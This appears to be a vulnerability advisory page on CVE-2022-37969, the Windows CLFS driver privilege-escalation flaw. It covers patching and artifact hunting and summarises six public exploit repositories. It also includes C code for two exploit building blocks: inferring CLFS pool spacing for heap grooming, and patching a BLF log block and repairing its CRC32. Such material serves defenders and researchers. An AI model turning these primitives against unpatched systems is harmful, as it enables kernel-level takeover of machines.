Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2022-37969 is a local elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS) driver, CLFS.sys. Microsoft and multiple public reports describe it as a post-compromise flaw: an attacker who already has local code execution on the host can use it to reach SYSTEM. It was exploited in the wild as a zero-day before the fix shipped, and public exploit code became available afterwards. Exploitation is driven from user mode through the clfsw32.dll APIs (CreateLogFile, AddLogContainer and related calls) to create and manipulate base log (BLF) files and containers whose crafted contents trigger kernel memory corruption when CLFS.sys parses them. The vulnerability affects Windows 10 and Windows 11 (and, per the exploit summaries below, Windows Server 2016/2019/2022) and was fixed in Microsoft's September 2022 Patch Tuesday release. Public reporting indicates that threat actors, including BianLian, used the flaw to obtain elevated privileges after initial access.
Impact, mitigation & remediation
Impact: an attacker who already has local code execution on an unpatched host can drive CLFS.sys into corrupting kernel memory and replace the current process token with the SYSTEM token; every working exploit summarized below ends in a SYSTEM process (cmd.exe or notepad.exe). The flaw was exploited in the wild and several public exploits exist, so the bar for using it is low.
Remediation: install the September 2022 security update (or any later cumulative update) on every affected Windows 10, Windows 11 and Windows Server host. For hosts that an attacker could reach while they were unpatched, patch and then assume compromise: the public exploits leave on-disk artifacts (BLF and container files under C:\Users\Public, %TEMP%\heap_spray_temp, %public% and the user's Desktop, as listed in the summaries below), and a SYSTEM-level cmd.exe spawned by an unprivileged process is the end state to hunt for.
Exploits
Six exploit repositories are summarized below; fakes, detection-only scripts and README-only repositories were excluded.
This repository is a Windows local privilege escalation exploit for CVE-2022-37969 in the Common Log File System (CLFS). It contains both a crash-oriented proof of trigger (crash.cpp) and a fuller privilege-escalation exploit (poc.cpp plus supporting modules). The code is not part of a public exploit framework.

Repository structure:
- poc.cpp: main exploit entry point. It orchestrates token and kernel address discovery, CLFS pool offset discovery, malicious Log.blf crafting, heap spraying, named-pipe-based arbitrary read/write preparation, vulnerability triggering, token replacement, and finally launching cmd.exe.
- crash.cpp: standalone, simpler trigger that crafts a CLFS log and closes handles to induce the bug, likely for crash validation.
- leak.cpp: retrieves the current and SYSTEM EPROCESS addresses and the kernel module bases.
- createLogFile.cpp: creates CLFS logs and containers.
- getOffset.cpp: repeatedly creates CLFS logs and queries SystemBigPoolInformation to infer the stable spacing between CLFS pool allocations.
- craftFile.cpp: corrupts specific offsets inside Log.blf and recomputes the CRC32.
- attack.cpp: heap spraying, named pipe attribute manipulation, kernel pointer calculation, bug triggering, SYSTEM token leakage, and token overwrite.
- clear.cpp: removes artifacts.

Main exploit capability: the exploit reaches SYSTEM by abusing the CLFS vulnerability to redirect a kernel structure access to attacker-controlled memory, then using a named pipe attribute object as a primitive to read the kernel memory holding the SYSTEM EPROCESS token and later overwrite the current process token. It explicitly references ClfsEarlierLsn and SeSetAccessStateGenericMapping, computes their kernel addresses by loading clfs.sys and ntoskrnl.exe in user mode and rebasing their offsets against the live kernel module bases, and uses crafted fake structures in user-mapped memory. It also sprays memory at fixed addresses (0x5000000 and 0x10000), allocates a fake user mapping near 0xffffffff, and assumes the token field is at EPROCESS+0x4b8 (a build-specific offset, so the exploit is tied to the Windows builds that use it).

Fingerprintable artifacts are primarily local file paths and module names rather than network indicators. The exploit creates and modifies CLFS files under C:\Users\Public\, including Log.blf, Lxg*.blf, and container_* files, and loads/targets CLFS.SYS, ntoskrnl.exe, and ntdll.dll. No external network communication, URLs, domains, or IPs are present.

Overall purpose: this is a real local Windows kernel exploit for CVE-2022-37969, intended to demonstrate and weaponize CLFS corruption into privilege escalation. It is more than a simple PoC because it includes a working post-exploitation outcome (a SYSTEM shell), but the payload is basic and hardcoded rather than framework-driven or configurable.
Repository purpose: proof-of-concept local privilege escalation exploit for CVE-2022-37969 in Windows CLFS (CLFS.SYS). It contains two separate PoCs, one for Windows 10 (win10_poc/) and one for Windows 11 (win11_poc/), both using CLFS log/container operations plus pool grooming to obtain a kernel write primitive and then elevate privileges.

Structure and key components:
- README.md: states that this is a CVE-2022-37969 PoC and lists the tested builds (Win10 19044.1766, Win11 22000.918) and the build toolchain (VS2022 v143, SDK 10.0, C++14).

Win10 PoC (win10_poc/):
- poc_test.cpp: main driver. Steps: initialize Big Pool querying; create a temp folder for log spraying; resolve the kernel addresses of SeSetAccessStateGenericMapping (ntoskrnl) and ClfsEarlierLsn (CLFS.SYS); perform the heap spray at fixed addresses; craft and CRC-fix MyMiniLog.blf; repeatedly measure CLFS pool spacing (GetOffsetBetweenPools); create/open CLFS logs (log:MyMiniLog and log:MyMiniLog_2); add CLFS containers; set the file mode via NtSetInformationFile to reach a CLFS RemoveContainer path; finally call ExecuteTokenReplacement(g_PreviousModeAddress) to steal the SYSTEM token and spawn cmd.
- bigpool.h: uses NtQuerySystemInformation(SystemBigPoolInformation) to enumerate big pool allocations and identifies CLFS allocations by tag 'Clfs' and size 0x7a00; tracks unique kernel virtual addresses.
- kernel_utils.h: leaks kernel module bases via SystemModuleInformation; computes the kernel addresses of the two functions by loading user-mode copies of ntoskrnl.exe and CLFS.SYS and adding the resulting offsets to the kernel bases; also leaks kernel object addresses from the handle table (SystemExtendedHandleInformation) and computes the ETHREAD->PreviousMode address (offset 0x232 on Win10 1803 through 22H2).
- clfs_operations.h: creates many CLFS logs under %TEMP%\heap_spray_temp; crafts the BLF file by writing specific bytes at hardcoded offsets; recalculates and fixes the CRC32 of the crafted block.
- heap_spray.h: allocates memory at 0x05000000 and 0x10000 and fills it with pointers to the resolved kernel functions; sets up the write target by populating a large region with a chosen address (PreviousMode-8) to support the arbitrary write primitive.
- token_operations.h: post-exploitation logic. Assumes PreviousMode has already been set to 0 (KernelMode), which makes NtReadVirtualMemory/NtWriteVirtualMemory skip their user-address checks and therefore read and write kernel memory. It locates the current EPROCESS via ETHREAD->Process, walks ActiveProcessLinks to find PID 4 (System), reads the System token, overwrites the current process token, restores PreviousMode to 1 (UserMode), and launches cmd.

Win11 PoC (win11_poc/):
- poc_test_win11.cpp: main driver for Win11. Initializes NtQuerySystemInformation and the temp folder, resolves kernel function addresses, obtains the current and System token addresses (via token_finder.h, not shown in the provided content), performs the heap spray, then initializes a pipe-based arbitrary read/write context (pipe_arbitrary_rw.h, not shown). It triggers the CLFS vulnerability twice via vul_trigger(): first to write the System token address into a pipe attribute value location so the token can be read back through the pipe, then to overwrite the current token with the System token; finally it spawns cmd.
- vulnerability_trigger.h: encapsulates the CLFS exploitation sequence: delete BLFs, create the base log, craft and CRC-fix the BLF, detect pool spacing, open logs, add containers, call SetTarget() to program the write values/address, then add another container and set the file mode via NtSetInformationFile to reach the vulnerable path.
- GetPoolInfoHead.h / GetKeyKernelAddressHead.h: Win11 equivalents of the big pool scan and kernel function address resolution.
- clfs_file_craft.h: Win11 version of BLF crafting and CRC fix.
- heap_spray.h (Win11): combines temp folder creation, pool spacing detection, heap spray, and SetTarget(write_value01, write_value02, write_address) to program the write primitive.

Overall exploit capabilities:
- Local kernel address disclosure: via SystemBigPoolInformation (CLFS pool allocations) and SystemExtendedHandleInformation (kernel object pointers), used to compute sensitive kernel addresses.
- Pool grooming / heap spray: repeated CreateLogFile calls and deterministic VirtualAlloc mappings place attacker-controlled data at predictable addresses.
- CLFS file crafting: modifies MyMiniLog.blf at fixed offsets and repairs the CRC32 to pass the driver's integrity check.
- Privilege escalation, Win10 path: uses the arbitrary write to set ETHREAD->PreviousMode to 0, then uses NtRead/WriteVirtualMemory for token stealing and replacement.
- Privilege escalation, Win11 path: uses the CLFS write primitive to pivot into a pipe-attribute-based kernel read, extracts the token value, then overwrites the current token.

No network I/O is present; all targets are local OS components (the CLFS subsystem, kernel modules, and local files under the current directory and %TEMP%).
This repository is a proof-of-concept (PoC) exploit for CVE-2022-37969, a local privilege escalation vulnerability in the Windows CLFS (Common Log File System) driver. The repository contains five files: a LICENSE, a detailed README.md explaining Windows privilege escalation and the exploit steps, and three C++ source files (crc32.cpp, crc32.h, exploit.cpp). The main exploit logic is in 'sources/exploit.cpp', which interacts with Windows kernel and CLFS driver APIs to manipulate kernel memory and overwrite the process token, thereby elevating privileges to SYSTEM. The exploit then spawns a SYSTEM-level command prompt. The code uses dynamic loading of ntdll.dll and clfsw32.dll, and references system files such as 'C:\Windows\System32\ntoskrnl.exe' and 'C:\Windows\System32\drivers\CLFS.SYS' to resolve function addresses for exploitation. The attack vector is local, requiring code execution on a vulnerable Windows system. The exploit is a PoC and is intended for educational and research purposes, as described in the README.
This repository contains a local privilege escalation exploit for CVE-2022-37969, a vulnerability in the Microsoft Windows Common Log File System (CLFS) driver. The main exploit logic is implemented in 'CVE-2022-37969/main.c', with supporting structures and macros in 'pch.h' and 'poc.h'. The exploit works by manipulating kernel memory structures to obtain a SYSTEM token and then spawns a new command prompt (cmd.exe) with SYSTEM privileges. The code is written in C and is designed to be compiled with Visual Studio for x64 Windows targets. The exploit requires local access to the vulnerable system and does not target network services. The repository includes Visual Studio project files and build logs, but the core exploit logic is in the C source files. The exploit is operational and provides a working privilege escalation payload, but is not part of a larger exploitation framework.
This repository is a local Windows kernel exploit proof-of-concept (PoC) targeting the CLFS (Common Log File System) component. The code is written primarily in C++ and is structured as a Visual Studio project, with supporting Python scripts for crafting binary log files. The main exploit logic is distributed across several C++ files:
- Prepare_BigPool.cpp / Prepare_BigPool.h: heap spraying and manipulation of kernel big pool allocations, specifically searching for and tracking CLFS pool tags in kernel memory.
- preparePipe.cpp: sets up named pipes and manipulates their attributes in kernel memory, using the kernel and driver base addresses to calculate function offsets and potentially perform arbitrary kernel memory writes.
- init.cpp / leak.cpp: environment setup, including determining the Windows version, locating kernel object addresses, and resolving kernel module base addresses.
- craft_blf/calculate_checksum.py: calculates CRC32 checksums for binary log files, likely used to craft valid CLFS log files for the exploit chain.

The exploit's main capabilities include:
- locating and manipulating CLFS pool structures in kernel memory;
- heap spraying to control memory layout;
- creating and manipulating log files and containers in the user's Desktop directory to trigger vulnerable code paths in the CLFS driver;
- calculating and using kernel and driver base addresses to perform precise memory operations.

The exploit is not weaponized and does not include a post-exploitation payload, but it demonstrates the ability to manipulate kernel memory and is likely intended for privilege escalation or further kernel exploitation. The attack vector is local, requiring code execution on the target system. The repository contains several fingerprintable file and registry endpoints, including hardcoded paths to log files and containers on the Desktop, and registry access to determine the Windows build number. The code is suitable for researchers or advanced attackers seeking to understand or exploit CLFS vulnerabilities on supported Windows versions.
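The big-pool scan that the second and fifth summaries describe (bigpool.h with GetOffsetBetweenPools, and Prepare_BigPool.cpp) comes down to two steps: filter the SystemBigPoolInformation result down to the distinct 'Clfs'-tagged allocations of the expected size, then look for a gap that repeats between neighbouring allocations. The C below is an added example written for this page, not code from any of the repositories; it makes no system call and instead parses a constructed snapshot laid out the way the x64 SYSTEM_BIGPOOL_INFORMATION buffer is (a 4-byte Count, 4 bytes of padding, then 24-byte entries with the NonPaged flag in bit 0 of VirtualAddress). The kernel base address, the 0x8000 spacing and the stray 'File' entry are invented sample values; the 'Clfs' tag and the 0x7a00 size come from the summaries, and all function names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

/* x64 layout of one SYSTEM_BIGPOOL_ENTRY as returned by
   NtQuerySystemInformation(SystemBigPoolInformation). Bit 0 of VirtualAddress is
   the NonPaged flag and must be masked off to recover the allocation address. */
typedef struct {
    uint64_t VirtualAddress;
    uint64_t SizeInBytes;
    uint8_t  Tag[4];
    uint8_t  Pad[4];
} BigPoolEntry;

#define BIGPOOL_ENTRIES_OFFSET 8   /* ULONG Count + 4 bytes of alignment padding */

/* Walk a snapshot buffer and collect the distinct addresses of allocations whose
   tag and size match. Returns the number of addresses written to out; a buffer
   shorter than Count claims is handled by stopping at the last complete entry. */
size_t collect_tagged_allocs(const uint8_t *buf, size_t buflen, const char tag[4],
                             uint64_t size, uint64_t *out, size_t max_out)
{
    uint32_t count;
    size_t found = 0, j;
    if (buflen < BIGPOOL_ENTRIES_OFFSET) return 0;
    memcpy(&count, buf, sizeof count);
    for (uint32_t i = 0; i < count; i++) {
        size_t off = BIGPOOL_ENTRIES_OFFSET + (size_t)i * sizeof(BigPoolEntry);
        BigPoolEntry e;
        uint64_t addr;
        if (off + sizeof e > buflen) break;
        memcpy(&e, buf + off, sizeof e);
        if (memcmp(e.Tag, tag, 4) != 0 || e.SizeInBytes != size) continue;
        addr = e.VirtualAddress & ~(uint64_t)1;
        for (j = 0; j < found && out[j] != addr; j++) ;
        if (j < found) continue;                 /* already seen: not a new allocation */
        if (found == max_out) break;
        out[found++] = addr;
    }
    return found;
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Sort the observed addresses, take the gaps between neighbours and return the gap
   that repeats most often, provided it repeats at least min_hits times. 0 means no
   stable spacing was found: a groom built on that assumption is unreliable. */
uint64_t infer_pool_spacing(const uint64_t *addrs, size_t n, size_t min_hits)
{
    uint64_t *g, best = 0;
    size_t m, i, run = 1, best_hits = 0;
    if (n < 2 || min_hits == 0) return 0;
    g = malloc(n * sizeof *g);
    if (!g) return 0;
    memcpy(g, addrs, n * sizeof *g);
    qsort(g, n, sizeof *g, cmp_u64);
    m = n - 1;
    for (i = 0; i < m; i++) g[i] = g[i + 1] - g[i];   /* neighbour gaps, in place */
    qsort(g, m, sizeof *g, cmp_u64);
    for (i = 1; i <= m; i++) {                         /* longest run of equal gaps */
        if (i < m && g[i] == g[i - 1]) { run++; continue; }
        if (run > best_hits) { best_hits = run; best = g[i - 1]; }
        run = 1;
    }
    free(g);
    return best_hits >= min_hits ? best : 0;
}

/* Constructed snapshot (not captured from a real system): five 'Clfs' 0x7a00
   allocations, one of them listed twice, plus an allocation of another tag
   sitting in the middle of the groomed range. */
size_t build_sample_snapshot(uint8_t *buf, size_t buflen)
{
    const uint64_t base = 0xffffa58012340000ull;   /* assumed kernel address */
    const BigPoolEntry e[7] = {
        { (base + 0x00000) | 1, 0x7a00, {'C','l','f','s'}, {0} },
        { (base + 0x08000) | 1, 0x7a00, {'C','l','f','s'}, {0} },
        { (base + 0x08000) | 1, 0x7a00, {'C','l','f','s'}, {0} },   /* duplicate */
        { (base + 0x10000) | 1, 0x7a00, {'C','l','f','s'}, {0} },
        { (base + 0x18000) | 1, 0x2000, {'F','i','l','e'}, {0} },   /* other tag */
        { (base + 0x20000) | 1, 0x7a00, {'C','l','f','s'}, {0} },
        { (base + 0x28000) | 1, 0x7a00, {'C','l','f','s'}, {0} },
    };
    const uint32_t count = 7;
    size_t need = BIGPOOL_ENTRIES_OFFSET + sizeof e;
    if (buflen < need) return 0;
    memset(buf, 0, need);
    memcpy(buf, &count, sizeof count);
    memcpy(buf + BIGPOOL_ENTRIES_OFFSET, e, sizeof e);
    return need;
}

static size_t g_sample_count;   /* distinct Clfs allocations seen by sample_spacing() */

/* Whole pipeline on the constructed snapshot: filter, dedupe, infer. */
uint64_t sample_spacing(size_t min_hits)
{
    uint8_t buf[256];
    uint64_t addrs[16];
    size_t len = build_sample_snapshot(buf, sizeof buf);
    g_sample_count = collect_tagged_allocs(buf, len, "Clfs", 0x7a00, addrs, 16);
    return infer_pool_spacing(addrs, g_sample_count, min_hits);
}

size_t sample_clfs_count(void) { sample_spacing(1); return g_sample_count; }

int main(void)
{
    printf("distinct Clfs allocations: %zu\n", sample_clfs_count());
    printf("spacing (>=3 hits): 0x%llx\n", (unsigned long long)sample_spacing(3));
    printf("spacing (>=4 hits): 0x%llx\n", (unsigned long long)sample_spacing(4));
    return 0;
}
```

The min_hits threshold is the check the summaries gloss over: when the modal gap does not recur, the spray has not produced a predictable layout, and proceeding means a likely kernel crash rather than a clean primitive. On a live system the buffer would come from NtQuerySystemInformation(SystemBigPoolInformation) taken before and after each CreateLogFile, with only the addresses new to the later snapshot fed into the inference so that unrelated 'Clfs' allocations do not skew the gaps.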
This repository contains a functional proof-of-concept (PoC) exploit for CVE-2022-37969, a local privilege escalation vulnerability in the Windows Common Log File System (CLFS) driver (CLFS.sys). The main exploit code is in 'CVE-2022-37969-PoC.cpp', which is a C++ program that targets multiple versions of Windows (10, 11, Server 2016/2019/2022) by leveraging a kernel memory corruption bug to overwrite the current process's token with the SYSTEM token. The exploit works by creating and manipulating BLF log files, performing heap spraying, and exploiting the CLFS.sys vulnerability to gain arbitrary kernel write. It then locates and copies the SYSTEM token to the current process, resulting in SYSTEM-level privileges. The exploit finally launches a process (e.g., notepad.exe) as SYSTEM to demonstrate successful privilege escalation. The repository also includes a detailed README.md with exploitation steps, technical background, and references. No network endpoints are involved; the attack vector is purely local. The code interacts with the Windows registry to determine the OS version and uses file paths such as '\SystemRoot\System32\drivers\CLFS.SYS' and '%public%\MyLog.blf' as part of the exploitation process.
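Every summary above includes a step that edits bytes inside the base log file and then recomputes the CRC32 so the driver's integrity check still passes (craftFile.cpp, clfs_operations.h, clfs_file_craft.h, calculate_checksum.py). The C below is an added example, not code from any of these repositories or from Microsoft: it implements the standard CRC-32 and a patch-then-fix routine over a block-sized buffer. The checksum field offset (0x0C) and the convention that the CRC covers the whole block with that field read as zero are assumptions stated in the code and should be checked against the target's CLFS_LOG_BLOCK_HEADER; the block contents in the self-check are constructed, not a real BLF image, and the function names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Standard reflected CRC-32 (polynomial 0xEDB88320, initial and final XOR
   0xFFFFFFFF), i.e. the value zlib's crc32() returns. crc32_update() takes and
   returns a finalised CRC so a buffer can be fed in pieces. */
static uint32_t crc_table[256];
static int crc_table_ready;

static void crc_table_init(void)
{
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? 0xEDB88320u ^ (c >> 1) : c >> 1;
        crc_table[i] = c;
    }
    crc_table_ready = 1;
}

uint32_t crc32_update(uint32_t crc, const uint8_t *p, size_t n)
{
    if (!crc_table_ready) crc_table_init();
    crc = ~crc;
    for (size_t i = 0; i < n; i++)
        crc = crc_table[(crc ^ p[i]) & 0xFF] ^ (crc >> 8);
    return ~crc;
}

uint32_t crc32_buf(const uint8_t *p, size_t n) { return crc32_update(0, p, n); }

#define BLF_SECTOR_SIZE 0x200
/* ASSUMPTION: offset of the 32-bit Checksum field inside the CLFS log block
   header. Verify it against the target's CLFS_LOG_BLOCK_HEADER before use. */
#define BLF_CHECKSUM_OFFSET 0x0C

static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xFF; p[1] = (v >> 8) & 0xFF; p[2] = (v >> 16) & 0xFF; p[3] = (v >> 24) & 0xFF;
}

/* ASSUMPTION: the driver computes CRC-32 over the whole block with the
   Checksum field itself read as zero. */
uint32_t blf_block_checksum(const uint8_t *block, size_t len)
{
    static const uint8_t zero4[4];
    uint32_t c;
    if (len < BLF_CHECKSUM_OFFSET + 4) return 0;
    c = crc32_update(0, block, BLF_CHECKSUM_OFFSET);
    c = crc32_update(c, zero4, 4);
    return crc32_update(c, block + BLF_CHECKSUM_OFFSET + 4, len - BLF_CHECKSUM_OFFSET - 4);
}

/* 1 if the stored checksum matches the block contents, 0 otherwise. */
int blf_block_verify(const uint8_t *block, size_t len)
{
    if (len < BLF_CHECKSUM_OFFSET + 4) return 0;
    return get_le32(block + BLF_CHECKSUM_OFFSET) == blf_block_checksum(block, len);
}

/* Overwrite dlen bytes at `offset` (the "corrupt specific offsets" step in the
   summaries) and repair the checksum so the block still passes the driver's
   integrity check. Returns 0 on a bad offset/length. */
int blf_block_patch_and_fix(uint8_t *block, size_t len, size_t offset,
                            const uint8_t *data, size_t dlen)
{
    if (len < BLF_CHECKSUM_OFFSET + 4 || offset > len || dlen > len - offset) return 0;
    memcpy(block + offset, data, dlen);
    put_le32(block + BLF_CHECKSUM_OFFSET, blf_block_checksum(block, len));
    return 1;
}

/* Walk-through on a constructed two-sector block (not a real BLF image): a valid
   block verifies, a naive byte edit breaks verification, and patch-and-fix
   restores it. Returns 1 when all three checks behave as expected. */
int blf_selfcheck(void)
{
    uint8_t block[2 * BLF_SECTOR_SIZE];
    const uint8_t value[4] = { 0xEF, 0xBE, 0xAD, 0xDE };
    memset(block, 0, sizeof block);
    block[0] = 1;                       /* stand-in for the version bytes */
    block[4] = 2;                       /* stand-in for TotalSectorCount */
    put_le32(block + BLF_CHECKSUM_OFFSET, blf_block_checksum(block, sizeof block));
    if (!blf_block_verify(block, sizeof block)) return 0;

    block[0x100] ^= 0x41;               /* edit without fixing the checksum */
    if (blf_block_verify(block, sizeof block)) return 0;

    if (!blf_block_patch_and_fix(block, sizeof block, 0x100, value, sizeof value)) return 0;
    return blf_block_verify(block, sizeof block);
}

int main(void)
{
    printf("crc32(\"123456789\") = 0x%08X\n", (unsigned)crc32_buf((const uint8_t *)"123456789", 9));
    printf("blf selfcheck: %s\n", blf_selfcheck() ? "ok" : "FAILED");
    return 0;
}
```

The checksum is the only integrity control the summaries mention, and it is a CRC, not a MAC: anyone who can write the file can recompute it, which is why a crafted BLF is accepted by the driver at all. One detail of the on-disk format beyond what the page describes: the driver's block encoding also moves the last two bytes of each 512-byte sector into a signature array and writes a sector signature in their place, so a real crafter has to redo that step as well as the CRC; the example above models only the CRC.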
Recent activity
Related CLFS items referenced by the tracked sources (seven sources across advisories, community write-ups, and news):
- A prior vulnerability in the Windows CLFS.sys subsystem, referenced as part of a pattern of recurring CLFS driver flaws.
- A specific Windows-related vulnerable driver issue, referenced in the detection's supporting material.
- A Windows CLFS zero-day local privilege escalation vulnerability, referenced in supporting material about CLFS exploit internals.
- A Windows CLFS driver elevation-of-privilege vulnerability, referenced as having been exploited in the wild.